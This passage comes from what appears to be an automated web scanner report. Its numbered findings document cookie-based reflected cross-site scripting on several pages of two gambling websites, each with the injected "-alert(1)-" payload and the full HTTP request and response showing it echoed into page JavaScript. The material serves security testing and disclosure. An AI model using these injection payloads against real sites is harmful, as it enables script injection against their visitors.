X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: BO=FM57bb5"-alert(1)-"30552f99443; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM57bb5"-alert(1)-"30552f99443";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.417. http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd2a"-alert(1)-"30ca785aaae was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMdfd2a"-alert(1)-"30ca785aaae; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdfd2a"-alert(1)-"30ca785aaae; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdfd2a"-alert(1)-"30ca785aaae";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.418. http://www.scratchcardheaven.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82eb9"-alert(1)-"ecfe1c41134 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM82eb9"-alert(1)-"ecfe1c41134; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: BO=FM82eb9"-alert(1)-"ecfe1c41134; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM82eb9"-alert(1)-"ecfe1c41134";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.419. http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b43be"-alert(1)-"ad71309d0a7 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMb43be"-alert(1)-"ad71309d0a7; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb43be"-alert(1)-"ad71309d0a7; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb43be"-alert(1)-"ad71309d0a7";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.420. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7db"-alert(1)-"f514a857bcb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM3c7db"-alert(1)-"f514a857bcb; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: BO=FM3c7db"-alert(1)-"f514a857bcb; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3c7db"-alert(1)-"f514a857bcb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.421. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f182d"-alert(1)-"6e6579ca1bd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf182d"-alert(1)-"6e6579ca1bd; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf182d"-alert(1)-"6e6579ca1bd; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf182d"-alert(1)-"6e6579ca1bd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.422. http://www.scratchcardheaven.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90668"-alert(1)-"374c5063c2d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM90668"-alert(1)-"374c5063c2d; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: BO=FM90668"-alert(1)-"374c5063c2d; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM90668"-alert(1)-"374c5063c2d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.423. http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798e6"-alert(1)-"79a9ef6c139 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM798e6"-alert(1)-"79a9ef6c139; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM798e6"-alert(1)-"79a9ef6c139; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM798e6"-alert(1)-"79a9ef6c139";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.424. http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ddf"-alert(1)-"c8dcab5784e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMe5ddf"-alert(1)-"c8dcab5784e; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: BO=FMe5ddf"-alert(1)-"c8dcab5784e; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5ddf"-alert(1)-"c8dcab5784e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.425. http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea86"-alert(1)-"b9a0cab5f85 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMbea86"-alert(1)-"b9a0cab5f85; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbea86"-alert(1)-"b9a0cab5f85; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbea86"-alert(1)-"b9a0cab5f85";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.426. http://www.svenskalotter.com/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cec3"-alert(1)-"c018451af4e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

